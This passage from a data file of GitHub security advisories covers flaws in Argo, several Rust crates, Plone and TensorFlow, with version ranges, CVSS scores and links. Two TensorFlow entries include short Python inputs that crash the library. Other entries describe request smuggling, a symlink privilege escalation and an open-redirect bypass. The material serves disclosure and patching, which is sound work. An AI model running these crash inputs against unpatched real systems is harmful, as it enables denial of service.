'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyter/notebook/security/advisories/GHSA-hwvq-6gjx-j797'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32798'}, {'type': 'WEB', 'url': 'https://github.com/jupyter/notebook/commit/79fc76e890a8ec42f73a3d009e44ef84c14ef0d5'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T16:44:43Z', 'nvd_published_at': '2021-08-09T21:15:00Z'}" +1.4.0,GHSA-prqf-xr2j-xf65,2021-08-23T17:05:11Z,2021-08-23T19:41:41Z,,[],Potential privilege escalation on Kubernetes >= v1.19 when the Argo Sever is run with `--auth-mode=client`,"### Impact + +This is pro-active fix. No know exploits exist. + +Impacted: + +* You're running Kubernetes >= v1.19 +* You're running Argo Server +* It is configured to with `--auth-mode=client` +* Is not configured with `--auth-mode=server` +* You are not running Argo Server in Kubernetes pod. E.g. on bare metal or other VM. +* You're using client key to authenticate on the server. +* The server has more permissions that the connecting client's account. + +The client's authentication will be ignored and the server's authentication will be used. This will result in privilege escalation to that of the the server's account. + +### Patches + +https://github.com/argoproj/argo-workflows/pull/6506 + +### Workarounds + +None.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/security/advisories/GHSA-prqf-xr2j-xf65'}]","{'cwe_ids': ['CWE-285'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:05:11Z', 'nvd_published_at': None}" +1.4.0,GHSA-mp6f-p9gp-vpj9,2022-06-14T20:54:51Z,2021-08-25T20:46:06Z,,['CVE-2020-25792'],Array size is not checked in sized-chunks,"An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with pair().","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sized-chunks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25792'}, {'type': 'WEB', 'url': 'https://github.com/bodil/sized-chunks/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodil/sized-chunks'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0041.html'}]","{'cwe_ids': ['CWE-129'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-773q-5334-5gf9,2021-08-18T21:38:27Z,2021-08-25T20:55:36Z,,[],Memory over-allocation in evm-core,"Prior to the patch, when executing specific EVM opcodes related +to memory operations that use `evm_core::Memory::copy_large`, the +crate can over-allocate memory when it is not needed, making it +possible for an attacker to perform denial-of-service attack. + +The flaw was corrected in commit `19ade85`. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'evm-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.26.0'}, {'fixed': '0.26.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'evm-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.25.0'}, {'fixed': '0.25.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'evm-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.24.0'}, {'fixed': '0.24.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'evm-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.23.0'}, {'fixed': '0.23.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'evm-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-blockchain/evm/commit/19ade85'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-blockchain/evm'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0066.html'}]","{'cwe_ids': ['CWE-789'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:38:27Z', 'nvd_published_at': None}" +1.4.0,GHSA-jh2g-xhqq-x4w9,2021-08-24T17:52:52Z,2021-08-25T21:00:07Z,2021-08-24T17:52:52Z,[],Send/Sync bound needed on T for Send/Sync impl of RcuCell,"Affected versions of this crate unconditionally implement Send/Sync for `RcuCell`. +This allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell` that provide access to `&T`. + +This can result in memory corruption caused by data races. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'rcu_cell'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/issues/3'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/rcu_cell'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0131.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T20:11:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-8928-2fgm-6x9x,2021-08-18T20:13:40Z,2021-08-25T20:58:21Z,,['CVE-2021-38512'],HTTP Request Smuggling in actix-http,"Affected versions of this crate did not properly detect invalid requests that could allow HTTP/1 request smuggling (HRS) attacks when running alongside a vulnerable front-end proxy server. This can result in leaked internal and/or user data, including credentials, when the front-end proxy is also vulnerable. + +Popular front-end proxies and load balancers already mitigate HRS attacks so it is recommended that they are also kept up to date; check your specific set up. You should upgrade even if the front-end proxy receives exclusively HTTP/2 traffic and connects to the back-end using HTTP/1; several downgrade attacks are known that can also expose HRS vulnerabilities.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'actix-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38512'}, {'type': 'WEB', 'url': 'https://github.com/actix/actix-web/pull/2363'}, {'type': 'WEB', 'url': 'https://github.com/actix/actix-web/commit/e965d8298f421e9c89fe98b1300b8361e948c324'}, {'type': 'PACKAGE', 'url': 'https://github.com/actix/actix-web'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/67URRW4K47SR6LNQB4YALPLGGQMQK7HO/'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/actix-http/RUSTSEC-2021-0081.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0081.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:13:40Z', 'nvd_published_at': '2021-08-10T23:15:00Z'}" +1.4.0,GHSA-8c6g-4xc5-w96c,2023-06-13T16:57:24Z,2021-08-25T20:43:52Z,,['CVE-2018-20992'],Uninitialized memory exposure in claxon,"Affected versions of Claxon made an invalid assumption about the decode buffer size being a multiple of a value read from the bitstream. This could cause parts of the decode buffer to not be overwritten. If the decode buffer was newly allocated and uninitialized, this uninitialized memory could be exposed. + +This allows an attacker to observe parts of the uninitialized memory in the decoded audio stream. + +The flaw was corrected by checking that the value read from the bitstream divides the decode buffer size, and returning a format error if it does not. If an error is returned, the decode buffer is not exposed. Regression tests and an additional fuzzer have been added to prevent similar flaws in the future.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'claxon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'claxon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20992'}, {'type': 'WEB', 'url': 'https://github.com/ruuda/claxon/commit/8f28ec275e412dd3af4f3cda460605512faf332c'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruuda/claxon'}, {'type': 'WEB', 'url': 'https://github.com/ruuda/claxon/releases/tag/v0.3.2'}, {'type': 'WEB', 'url': 'https://github.com/ruuda/claxon/releases/tag/v0.4.1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0004.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-m3ww-7hrp-gw9w,2023-06-13T19:52:17Z,2021-08-25T20:47:41Z,,['CVE-2020-35878'],Drop of uninitialized memory in Ozone,An issue was discovered in the ozone crate through version 0.1.0 for Rust. Memory safety is violated because of the dropping of uninitialized memory.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ozone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35878'}, {'type': 'PACKAGE', 'url': 'https://github.com/bqv/ozone'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0022.html'}]","{'cwe_ids': ['CWE-119', 'CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:59Z', 'nvd_published_at': None}" +1.4.0,GHSA-rccq-j2m7-8fwr,2023-06-13T18:19:30Z,2021-08-25T20:55:14Z,,['CVE-2021-30457'],Double-free in id-map,"A double free can occur in remove_set upon a panic in a Drop impl. When removing a set of elements, ptr::drop_in_place is called on each of the element to be removed. If the Drop impl of one of these elements panics then the previously dropped elements can be dropped again.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'id-map'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30457'}, {'type': 'WEB', 'url': 'https://github.com/andrewhickman/id-map/issues/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/andrewhickman/id-map'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0052.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:04:15Z', 'nvd_published_at': None}" +1.4.0,GHSA-vfqx-hv88-f9cv,2023-06-13T18:19:49Z,2021-08-25T20:55:22Z,,['CVE-2021-30456'],Double-free in id-map,"A double free can occur in get_or_insert upon a panic of a user-provided f function. get_or_insert reserves space for a value, before calling the user provided insertion function f. If the function f panics then uninitialized or previously freed memory can be dropped.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'id-map'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30456'}, {'type': 'WEB', 'url': 'https://github.com/andrewhickman/id-map/issues/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/andrewhickman/id-map'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0052.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:04:13Z', 'nvd_published_at': None}" +1.4.0,GHSA-gx73-2498-r55c,2023-06-13T17:17:49Z,2021-08-25T20:46:49Z,,['CVE-2019-25004'],Unsound casting in flatbuffers,"The implementation of impl Follow for bool allows to reinterpret arbitrary bytes as a bool. + +In Rust bool has stringent requirements for its in-memory representation. Use of this function allows to violate these requirements and invoke undefined behaviour in safe code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'flatbuffers'}, 'ecosystem_specific': {'affected_functions': ['flatbuffers::Follow::follow']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25004'}, {'type': 'WEB', 'url': 'https://github.com/google/flatbuffers/issues/5530'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/flatbuffers'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0028.html'}]","{'cwe_ids': ['CWE-704'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:36Z', 'nvd_published_at': None}" +1.4.0,GHSA-ghpq-vjxw-ch5w,2021-08-18T20:41:10Z,2021-08-25T20:56:52Z,,[],Use after free in libpulse-binding,"### Overview + +Version 1.2.1 of the `libpulse-binding` Rust crate, released on the 15th of June 2018, fixed a pair of use-after-free issues with the objects returned by the `get_format_info` and `get_context` methods of `Stream` objects. These objects were mistakenly being constructed without setting an important flag to prevent destruction of the underlying C objects they reference upon their own destruction. + +This advisory is being written retrospectively, having previously only been noted in the changelog. No CVE assignment was sought. + +### Patches + +Users are required to update to version 1.2.1 or newer. + +Versions older than 1.2.1 have been yanked from crates.io. This was believed to have already been done at the time of the 1.2.1 release, but upon double checking now they were found to still be available, so has been done now (22nd October 2020).",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'libpulse-binding'}, 'ecosystem_specific': {'affected_functions': ['libpulse_binding::stream::Stream::get_context', 'libpulse_binding::stream::Stream::get_format_info']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jnqnfe/pulse-binding-rust/security/advisories/GHSA-ghpq-vjxw-ch5w'}, {'type': 'PACKAGE', 'url': 'https://github.com/jnqnfe/pulse-binding-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0021.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:41:10Z', 'nvd_published_at': None}" +1.4.0,GHSA-pp74-39w2-v4w9,2023-04-03T19:13:35Z,2021-08-25T21:01:44Z,,['CVE-2021-31154'],Permissions bypass in pleaser,pleaseedit in pleaser before 0.4.0 uses predictable temporary filenames in /tmp and the target directory. This allows a local attacker to gain full root privileges by staging a symlink attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pleaser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31154'}, {'type': 'WEB', 'url': 'https://crates.io/crates/pleaser'}, {'type': 'WEB', 'url': 'https://gitlab.com/edneville/please'}, {'type': 'WEB', 'url': 'https://gitlab.com/edneville/please/-/tree/master/src/bin'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0102.html'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2021/05/18/1'}]","{'cwe_ids': ['CWE-340', 'CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:34:12Z', 'nvd_published_at': '2021-05-27T13:15:00Z'}" +1.4.0,GHSA-q3m9-9fj2-mfwr,2021-08-30T23:21:07Z,2021-08-05T17:02:12Z,,['CVE-2021-32806'],URL Redirection to Untrusted Site ('Open Redirect') in Products.isurlinportal,"### Impact +Various parts of Plone use the 'is url in portal' check for security, mostly to see if it is safe to redirect to a url. A url like `https://example.org` is not in the portal. +But the url `https:example.org` without slashes tricks our code and it _is_ considered to be in the portal. +When redirecting, some browsers go to `https://example.org`, others give an error. +Attackers may use this to redirect you to their site, especially as part of a phishing attack. + +### Patches +The problem has been patched in `Products.isurlinportal` 1.2.0. +This is a recommended upgrade for all users of Plone 4.3 and 5, on Python 2.7 or higher. +It has not been tested on earlier Plone or Python versions. +Upcoming Plone 5.2.5 and higher will include the new version. + +### Discovered +This vulnerability was discovered and reported by Yuji Tounai of Mitsui Bussan Secure Directions, Inc. Thank you! + +### For more information +If you have any questions or comments about this advisory: +* Email the Plone Security Team at [security@plone.org](mailto:security@plone.org), especially when you think you have discovered a security problem or when you are not sure. +* Open an issue in [the tracker](https://github.com/plone/Products.isurlinportal/issues) if your question or comment can be public. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Products.isurlinportal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/plone/Products.isurlinportal/security/advisories/GHSA-q3m9-9fj2-mfwr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32806'}, {'type': 'WEB', 'url': 'https://github.com/plone/Products.isurlinportal/commit/d4fd34990d18adf05a10dc5e2bb4b066798280ba'}, {'type': 'PACKAGE', 'url': 'https://github.com/plone/Products.isurlinportal'}, {'type': 'WEB', 'url': 'http://jvn.jp/en/jp/JVN50804280/index.html'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T23:19:30Z', 'nvd_published_at': '2021-08-02T19:15:00Z'}" +1.4.0,GHSA-x3v2-fgr6-3wmm,2021-08-19T18:40:57Z,2021-08-25T20:53:03Z,,['CVE-2021-25908'],Double free in fil-ocl,An issue was discovered in the fil-ocl crate through 2021-01-04 for Rust. From can lead to a double free.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'fil-ocl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25908'}, {'type': 'WEB', 'url': 'https://github.com/cogciprocate/ocl/issues/194'}, {'type': 'PACKAGE', 'url': 'https://github.com/filecoin-project/fil-ocl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0011.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:40:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-5xwc-mrhx-5g3m,2021-08-24T13:10:06Z,2021-08-25T14:42:52Z,,['CVE-2021-37657'],Reference binding to nullptr in `MatrixDiagV*` ops,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixDiagV*`: + +```python +import tensorflow as tf + +tf.raw_ops.MatrixDiagV3( + diagonal=[1,0], + k=[], + num_rows=[1,2,3], + num_cols=[4,5], + padding_value=[], + align='RIGHT_RIGHT') +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong: + +```cc + auto& diag_index = context->input(1); + ... + lower_diag_index = diag_index.flat()(0); +``` + +### Patches +We have patched the issue in GitHub commit [f2a673bd34f0d64b8e40a551ac78989d16daad09](https://github.com/tensorflow/tensorflow/commit/f2a673bd34f0d64b8e40a551ac78989d16daad09). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5xwc-mrhx-5g3m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37657'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f2a673bd34f0d64b8e40a551ac78989d16daad09'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:10:06Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-69vj-xx27-g45w,2023-06-13T18:12:42Z,2021-08-25T20:51:49Z,,['CVE-2020-36216'],Data race in eventio,"Input implements Send without requiring R: Send. + +Affected versions of this crate allows users to send non-Send types to other threads, which can lead to undefined behavior such as data race and memory corruption. + +The flaw was corrected in version 0.5.1 by adding R: Send bound to the Send impl of Input.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'eventio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36216'}, {'type': 'WEB', 'url': 'https://github.com/petabi/eventio/issues/33'}, {'type': 'PACKAGE', 'url': 'https://github.com/petabi/eventio'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0108.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:47:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-8xw8-mmqv-frqq,2021-08-18T21:41:18Z,2021-08-25T20:55:33Z,,[],fake-static allows converting any reference into a `'static` reference,"fake-static allows converting a reference with any lifetime into +a reference with `'static` lifetime without the `unsafe` keyword. + +Internally, this crate does not use unsafe code, it instead +exploits a soundness bug in rustc + + +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'fake-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-lang/rust/issues/25860'}, {'type': 'PACKAGE', 'url': 'https://github.com/NieDzejkob/fake-static'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0013.html'}]","{'cwe_ids': ['CWE-657'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:41:18Z', 'nvd_published_at': None}" +1.4.0,GHSA-gf88-j2mg-cc82,2021-08-24T13:23:52Z,2021-08-25T14:42:28Z,,['CVE-2021-37661'],Crash caused by integer conversion to unsigned,"### Impact +An attacker can cause a denial of service in `boosted_trees_create_quantile_stream_resource` by using negative arguments: + +```python +import tensorflow as tf +from tensorflow.python.ops import gen_boosted_trees_ops +import numpy as np + +v= tf.Variable([0.0, 0.0, 0.0, 0.0, 0.0]) +gen_boosted_trees_ops.boosted_trees_create_quantile_stream_resource( + quantile_stream_resource_handle = v.handle, + epsilon = [74.82224], + num_streams = [-49], + max_elements = np.int32(586)) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/quantile_ops.cc#L96) does not validate that `num_streams` only contains non-negative numbers. In turn, [this results in using this value to allocate memory](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/quantiles/quantile_stream_resource.h#L31-L40): + +```cc +class BoostedTreesQuantileStreamResource : public ResourceBase { + public: + BoostedTreesQuantileStreamResource(const float epsilon, + const int64 max_elements, + const int64 num_streams) + : are_buckets_ready_(false), + epsilon_(epsilon), + num_streams_(num_streams), + max_elements_(max_elements) { + streams_.reserve(num_streams_); + ... + } +} +``` + +However, `reserve` receives an unsigned integer so there is an implicit conversion from a negative value to a large positive unsigned. This results in a crash from the standard library. + +### Patches +We have patched the issue in GitHub commit [8a84f7a2b5a2b27ecf88d25bad9ac777cd2f7992](https://github.com/tensorflow/tensorflow/commit/8a84f7a2b5a2b27ecf88d25bad9ac777cd2f7992). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 